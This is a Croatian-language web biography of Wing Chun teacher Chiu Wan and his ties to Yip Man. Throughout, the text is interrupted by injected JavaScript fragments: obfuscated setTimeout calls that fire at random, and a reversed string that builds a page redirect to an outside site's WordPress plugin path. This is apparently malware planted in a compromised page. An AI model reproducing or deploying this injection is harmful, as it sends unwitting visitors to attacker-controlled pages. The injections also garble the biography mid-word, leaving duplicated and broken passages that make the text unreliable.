Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andmaster Chiu Wan

andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}sigungChiu Wan rođen je u Foshanu, pokrajini Guangdong u Kini, u isandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tom gradu kao i majsandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tor Yip Man.

Chiu Wan je već sa 8 godina počeo vježbati Wing chun pod  Chiu Jow-om (svojim ujakom) te pod Chan Yu Min, sinom Chan Wah Tsun-a.

Jiu Jow je 5 generacija učenika Chan Wa Tsun-a  kao i njegov sin, Chan Yu Min.

Yip Manov učitelj (u Foshanu) bio je Chan Wa Tsun.

Chen Wa Tsun je bio jako dobar borac i učitelj te su Yip Man i Jiu Jow bili poznati po borbenom umijeću.

Yip Man je 6-a generacija dok je Chiu Wan 7-a generacija učenika. U andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to vrijeme u Fošanu obojica su bili članovi  policije.
andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}sigung2U ranim 1940-ima Yip Man je preselio u Hong Kong  i nastavio učenje preko Leung Bik-a. (sina Leung Yana)

Nakon šta se Chiu Wan preselio u Hong Kong potražio je Yip Mana te je uočio da se Yip Manov WIng Chun razlikuje od Wing Chandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}una kojeg su zajedno učili u Foshanu.

Nakon šta su se opet ujednili Yip Man je Chiu Wana naučio Wing Chunu koji mu je prenio Leung Bik.
U andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to vrijeme Yip Mananovi učenici bili su: Leung Sheung, Ip Bo Ching, Wong Shun Leung, Lok Yiu i Chu Shong Tin.
Chiu Wan je nakon šta su se ponovo ujednilii pratio i učio od Yip Mana sve do njegove smrti najčešće u večernjim satima posebno po noći.

najčešće u večernjim satima posebno po noći.
andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}sssseeeeBili su iz isandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tog rodni grada i bili su vrlo bliski prijatelji radi zajedničkog porijekla.
Yip Man je u znak podrške i pošandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tovanja postavio natpis u školi Chiu Wama sa svojim potpisom koji glasi “Izvorni Wing
Chunandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}
“.
Nažalost Chiu Wan preminuo je u 52 godini.